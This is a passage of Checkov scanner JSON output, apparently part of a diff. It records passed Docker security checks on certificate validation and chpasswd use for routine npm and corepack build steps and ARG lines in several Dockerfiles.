"https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_5", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_17", + "bc_check_id": null, + "check_name": "Ensure that 'chpasswd' is not used to set or remove passwords", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11, + "resource_type": "ARG", + "hash": "fded00a21c81cd45d8985324636a2acafc73bef594a45811ca0d68265da3f9dc" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 12, + 12 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ARG", + "hash": "11d98758a432fc03021573afe4df769dc34ff0a4aec966f558b5e00c71c6cf3b" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13, + "resource_type": "ARG", + "hash": "4075db881e0d222faeb86e03db8a05d9a998deab344c05aee0e89d2426e01383" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 14, + 14 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14, + "resource_type": "ARG", + "hash": "a4c9bf1c4e349946074fb4c606d0db63c06a809d125e58ddd09427e4d929fd6a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 15, + 15 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + 